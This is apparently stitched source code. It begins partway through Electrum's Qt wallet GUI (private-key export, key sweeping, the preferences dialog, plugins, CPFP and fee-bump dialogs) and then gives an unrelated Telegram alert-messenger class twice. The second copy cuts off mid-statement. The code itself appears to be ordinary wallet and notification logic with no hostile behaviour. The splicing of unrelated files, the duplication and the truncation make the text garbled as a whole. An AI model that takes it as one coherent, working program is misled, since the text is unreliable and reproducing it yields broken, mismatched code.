b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {str(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise try: coins, keypairs = sweep_preparations(get_pk(), self.network) except Exception as e: # FIXME too broad... self.show_message(str(e)) return self.do_clear() self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(addr) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) self.warn_if_watching_only() def _do_import(self, title, header_layout, func): text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum.i18n import languages lang_combo.addItems(list(languages.values())) lang_keys = list(languages.keys()) lang_cur_setting = self.config.get("language", '') try: index = lang_keys.index(lang_cur_setting) except ValueError: # not in list index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) msg = '\n'.join([ _('Time based: fee rate is based on average confirmation time estimates'), _('Mempool based: fee rate is targeting a depth in the memory pool') ] ) fee_type_label = HelpLabel(_('Fee estimation') + ':', msg) fee_type_combo = QComboBox() fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')]) fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0) def on_fee_type(x): self.config.set_key('mempool_fees', x==2) self.config.set_key('dynamic_fees', x>0) self.fee_slider.update() fee_type_combo.currentIndexChanged.connect(on_fee_type) fee_widgets.append((fee_type_label, fee_type_combo)) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_adv_controls.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) use_rbf = self.config.get('use_rbf', True) use_rbf_cb = QCheckBox(_('Use Replace-By-Fee')) use_rbf_cb.setChecked(use_rbf) use_rbf_cb.setToolTip( _('If you check this box, your transactions will be marked as non-final,') + '\n' + \ _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \ _('Note that some merchants do not accept non-final transactions until they are confirmed.')) def on_use_rbf(x): self.config.set_key('use_rbf', bool(x)) batch_rbf_cb.setEnabled(bool(x)) use_rbf_cb.stateChanged.connect(on_use_rbf) fee_widgets.append((use_rbf_cb, None)) batch_rbf_cb = QCheckBox(_('Batch RBF transactions')) batch_rbf_cb.setChecked(self.config.get('batch_rbf', False)) batch_rbf_cb.setEnabled(use_rbf) batch_rbf_cb.setToolTip( _('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \ _('This will save fees.')) def on_batch_rbf(x): self.config.set_key('batch_rbf', bool(x)) batch_rbf_cb.stateChanged.connect(on_batch_rbf) fee_widgets.append((batch_rbf_cb, None)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see https://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() self.alias_received_signal.connect(set_alias_color) alias_e.editingFinished.connect(on_alias_edit) id_widgets.append((alias_label, alias_e)) # SSL certificate msg = ' '.join([ _('SSL certificate used to sign payment requests.'), _('Use setconfig to set ssl_chain and ssl_privkey.'), ]) if self.config.get('ssl_privkey') or self.config.get('ssl_chain'): try: SSL_identity = paymentrequest.check_ssl_config(self.config) SSL_error = None except BaseException as e: SSL_identity = "error" SSL_error = str(e) else: SSL_identity = "" SSL_error = None SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg) SSL_id_e = QLineEdit(SSL_identity) SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '') if SSL_error: SSL_id_e.setToolTip(SSL_error) SSL_id_e.setReadOnly(True) id_widgets.append((SSL_id_label, SSL_id_e)) units = base_units_list msg = (_('Base unit of your wallet.') + '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n' + _('This setting affects the Send tab, and all balance related fields.')) unit_label = HelpLabel(_('Base unit') + ':', msg) unit_combo = QComboBox() unit_combo.addItems(units) unit_combo.setCurrentIndex(units.index(self.base_unit())) def on_unit(x, nz): unit_result = units[unit_combo.currentIndex()] if self.base_unit() == unit_result: return edits = self.amount_e, self.fee_e, self.receive_amount_e amounts = [edit.get_amount() for edit in edits] self.decimal_point = base_unit_name_to_decimal_point(unit_result) self.config.set_key('decimal_point', self.decimal_point, True) nz.setMaximum(self.decimal_point) self.history_list.update() self.request_list.update() self.address_list.update() for edit, amount in zip(edits, amounts): edit.setAmount(amount) self.update_status() unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz)) gui_widgets.append((unit_label, unit_combo)) block_explorers = sorted(util.block_explorer_info().keys()) msg = _('Choose which online block explorer to use for functions that open a web browser') block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg) block_ex_combo = QComboBox() block_ex_combo.addItems(block_explorers) block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config))) def on_be(x): be_result = block_explorers[block_ex_combo.currentIndex()] self.config.set_key('block_explorer', be_result, True) block_ex_combo.currentIndexChanged.connect(on_be) gui_widgets.append((block_ex_label, block_ex_combo)) from electrum import qrscanner system_cameras = qrscanner._find_system_cameras() qr_combo = QComboBox() qr_combo.addItem("Default","default") for camera, device in system_cameras.items(): qr_combo.addItem(camera, device) #combo.addItem("Manually specify a device", config.get("video_device")) index = qr_combo.findData(self.config.get("video_device")) qr_combo.setCurrentIndex(index) msg = _("Install the zbar package to enable this.") qr_label = HelpLabel(_('Video Device') + ':', msg) qr_combo.setEnabled(qrscanner.libzbar is not None) on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True) qr_combo.currentIndexChanged.connect(on_video_device) gui_widgets.append((qr_label, qr_combo)) colortheme_combo = QComboBox() colortheme_combo.addItem(_('Light'), 'default') colortheme_combo.addItem(_('Dark'), 'dark') index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default')) colortheme_combo.setCurrentIndex(index) colortheme_label = QLabel(_('Color theme') + ':') def on_colortheme(x): self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True) self.need_restart = True colortheme_combo.currentIndexChanged.connect(on_colortheme) gui_widgets.append((colortheme_label, colortheme_combo)) updatecheck_cb = QCheckBox(_("Automatically check for software updates")) updatecheck_cb.setChecked(self.config.get('check_updates', False)) def on_set_updatecheck(v): self.config.set_key('check_updates', v == Qt.Checked, save=True) updatecheck_cb.stateChanged.connect(on_set_updatecheck) gui_widgets.append((updatecheck_cb, None)) filelogging_cb = QCheckBox(_("Write logs to file")) filelogging_cb.setChecked(bool(self.config.get('log_to_file', False))) def on_set_filelogging(v): self.config.set_key('log_to_file', v == Qt.Checked, save=True) self.need_restart = True filelogging_cb.stateChanged.connect(on_set_filelogging) filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.')) gui_widgets.append((filelogging_cb, None)) usechange_cb = QCheckBox(_('Use change addresses')) usechange_cb.setChecked(self.wallet.use_change) if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False) def on_usechange(x): usechange_result = x == Qt.Checked if self.wallet.use_change != usechange_result: self.wallet.use_change = usechange_result self.wallet.storage.put('use_change', self.wallet.use_change) multiple_cb.setEnabled(self.wallet.use_change) usechange_cb.stateChanged.connect(on_usechange) usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.')) tx_widgets.append((usechange_cb, None)) def on_multiple(x): multiple = x == Qt.Checked if self.wallet.multiple_change != multiple: self.wallet.multiple_change = multiple self.wallet.storage.put('multiple_change', multiple) multiple_change = self.wallet.multiple_change multiple_cb = QCheckBox(_('Use multiple change addresses')) multiple_cb.setEnabled(self.wallet.use_change) multiple_cb.setToolTip('\n'.join([ _('In some cases, use up to 3 change addresses in order to break ' 'up large coin amounts and obfuscate the recipient address.'), _('This may result in higher transactions fees.') ])) multiple_cb.setChecked(multiple_change) multiple_cb.stateChanged.connect(on_multiple) tx_widgets.append((multiple_cb, None)) def fmt_docs(key, klass): lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")] return '\n'.join([key, "", " ".join(lines)]) choosers = sorted(coinchooser.COIN_CHOOSERS.keys()) if len(choosers) > 1: chooser_name = coinchooser.get_name(self.config) msg = _('Choose coin (UTXO) selection method. The following are available:\n\n') msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items()) chooser_label = HelpLabel(_('Coin selection') + ':', msg) chooser_combo = QComboBox() chooser_combo.addItems(choosers) i = choosers.index(chooser_name) if chooser_name in choosers else 0 chooser_combo.setCurrentIndex(i) def on_chooser(x): chooser_name = choosers[chooser_combo.currentIndex()] self.config.set_key('coin_chooser', chooser_name) chooser_combo.currentIndexChanged.connect(on_chooser) tx_widgets.append((chooser_label, chooser_combo)) def on_unconf(x): self.config.set_key('confirmed_only', bool(x)) conf_only = self.config.get('confirmed_only', False) unconf_cb = QCheckBox(_('Spend only confirmed coins')) unconf_cb.setToolTip(_('Spend only confirmed inputs.')) unconf_cb.setChecked(conf_only) unconf_cb.stateChanged.connect(on_unconf) tx_widgets.append((unconf_cb, None)) def on_outrounding(x): self.config.set_key('coin_chooser_output_rounding', bool(x)) enable_outrounding = self.config.get('coin_chooser_output_rounding', False) outrounding_cb = QCheckBox(_('Enable output value rounding')) outrounding_cb.setToolTip( _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' + _('This might improve your privacy somewhat.') + '\n' + _('If enabled, at most 100 satoshis might be lost due to this, per transaction.')) outrounding_cb.setChecked(enable_outrounding) outrounding_cb.stateChanged.connect(on_outrounding) tx_widgets.append((outrounding_cb, None)) # Fiat Currency hist_checkbox = QCheckBox() hist_capgains_checkbox = QCheckBox() fiat_address_checkbox = QCheckBox() ccy_combo = QComboBox() ex_combo = QComboBox() def update_currencies(): if not self.fx: return currencies = sorted(self.fx.get_currencies(self.fx.get_history_config())) ccy_combo.clear() ccy_combo.addItems([_('None')] + currencies) if self.fx.is_enabled(): ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency())) def update_history_cb(): if not self.fx: return hist_checkbox.setChecked(self.fx.get_history_config()) hist_checkbox.setEnabled(self.fx.is_enabled()) def update_fiat_address_cb(): if not self.fx: return fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config()) def update_history_capgains_cb(): if not self.fx: return hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config()) hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked()) def update_exchanges(): if not self.fx: return b = self.fx.is_enabled() ex_combo.setEnabled(b) if b: h = self.fx.get_history_config() c = self.fx.get_currency() exchanges = self.fx.get_exchanges_by_ccy(c, h) else: exchanges = self.fx.get_exchanges_by_ccy('USD', False) ex_combo.blockSignals(True) ex_combo.clear() ex_combo.addItems(sorted(exchanges)) ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange())) ex_combo.blockSignals(False) def on_currency(hh): if not self.fx: return b = bool(ccy_combo.currentIndex()) ccy = str(ccy_combo.currentText()) if b else None self.fx.set_enabled(b) if b and ccy != self.fx.ccy: self.fx.set_currency(ccy) update_history_cb() update_exchanges() self.update_fiat() def on_exchange(idx): exchange = str(ex_combo.currentText()) if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name(): self.fx.set_exchange(exchange) def on_history(checked): if not self.fx: return self.fx.set_history_config(checked) update_exchanges() self.history_model.refresh('on_history') if self.fx.is_enabled() and checked: self.fx.trigger_update() update_history_capgains_cb() def on_history_capgains(checked): if not self.fx: return self.fx.set_history_capital_gains_config(checked) self.history_model.refresh('on_history_capgains') def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_history_capgains_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) hist_capgains_checkbox.stateChanged.connect(on_history_capgains) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('General')), (fiat_widgets, _('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.trigger_update() self.alias_received_signal.disconnect(set_alias_color) run_hook('close_settings_dialog') if self.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.network.unregister_callback(self.on_quotes) self.network.unregister_callback(self.on_history) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.config.set_key("console-history", self.console.history[-50:], True) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp(self, parent_tx, new_tx): total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_fee = self.wallet.get_tx_fee(parent_tx) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): out_amt = max_fee - fee_e.get_amount() out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_e.get_amount() comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) new_tx.set_rbf(True) self.show_transaction(new_tx) def bump_fee_dialog(self, tx): fee = self.wallet.get_tx_fee(tx) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label(tx.txid()) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit())) vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate))) vbox.addWidget(QLabel(_('New Fee rate') + ':')) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) vbox.addWidget(feerate_e) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_slider.deactivate() vbox.addWidget(fee_slider) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config) except CannotBumpFee as e: self.show_error(str(e)) return if is_final: new_tx.set_rbf(False) self.show_transaction(new_tx, tx_label) def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True
from datetime import datetime from telegram import Bot import requests import tenacity from tenacity import ( stop_after_attempt, wait_exponential, ) import os from src.util.audio import convert_to_mp3 from src.util.vars import ( TELEGRAM_BOT_TOKEN, TELEGRAM_ID, TELEGRAM_INTERVAL_SECONDS, logger ) class TelegramMessenger: def __init__(self): self.last_message = None self.bot = Bot(os.environ[TELEGRAM_BOT_TOKEN]) def can_send_message(self, force_send=False): if force_send or self.last_message is None: logger.info(f"ℹ️ Sending message: force_send={force_send}, " f"last_message_exists={self.last_message is not None}.") return True seconds_since_last_message = (datetime.now() - self.last_message).seconds logger.info(f"ℹ️ Last message sent {(seconds_since_last_message / 60):.2f} minutes ago.") return seconds_since_last_message >= TELEGRAM_INTERVAL_SECONDS def set_message_sent(self, force_send=False): if not force_send: self.last_message = datetime.now() @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10)) def send_text_message(self, message, force_send=False): text_url = f"https://api.telegram.org/bot{os.environ[TELEGRAM_BOT_TOKEN]}" \ f"/sendMessage?chat_id={os.environ[TELEGRAM_ID]}" \ f"&parse_mode=Markdown&text={message}" response = requests.get(text_url) result = response.json() logger.info(f"🤖 Bot message sent: {bool(result["ok"])}") if response.status_code != 200: logger.info(f"❌ send_text_message() failed with status={response.status_code}") if bool(result["ok"]): self.set_message_sent(force_send) return True logger.exception(f"❌ Failed to send text message: {response}") raise Exception(f"❌ Failed to send text message: {response}") @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10)) def send_audio_message(self, mp3_file_path): logger.info(f"🤖 Trying to upload audio in {mp3_file_path}...") self.bot.send_voice( chat_id=os.environ[TELEGRAM_ID], voice=open(mp3_file_path, "rb") ) def send_alert(self, message, wav_file_path=None, force_send=False): can_send = self.can_send_message(force_send) if not can_send: logger.info(f"❌ Not sending message: can_send={can_send}; force_send={force_send}.") return try: self.send_text_message(message, force_send) if wav_file_path is not None: mp3_file_path = convert_to_mp3(wav_file_path) if os.path.exists(mp3_file_path): self.send_audio_message(mp3_file_path) logger.info(f"🗑 Removing: {mp3_file_path}") os.remove(mp3_file_path) except Exception as e: logger.info(f"❌ Failed to send alert: {str(e)}") logger.exception(e)
from datetime import datetime from telegram import Bot import requests import tenacity from tenacity import ( stop_after_attempt, wait_exponential, ) import os from src.util.audio import convert_to_mp3 from src.util.vars import ( TELEGRAM_BOT_TOKEN, TELEGRAM_ID, TELEGRAM_INTERVAL_SECONDS, logger ) class TelegramMessenger: def __init__(self): self.last_message = None self.bot = Bot(os.environ[TELEGRAM_BOT_TOKEN]) def can_send_message(self, force_send=False): if force_send or self.last_message is None: logger.info(f"ℹ️ Sending message: force_send={force_send}, " f"last_message_exists={self.last_message is not None}.") return True seconds_since_last_message = (datetime.now() - self.last_message).seconds logger.info(f"ℹ️ Last message sent {(seconds_since_last_message / 60):.2f} minutes ago.") return seconds_since_last_message >= TELEGRAM_INTERVAL_SECONDS def set_message_sent(self, force_send=False): if not force_send: self.last_message = datetime.now() @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10)) def send_text_message(self, message, force_send=False): text_url = f"https://api.telegram.org/bot{os.environ[TELEGRAM_BOT_TOKEN]}" \ 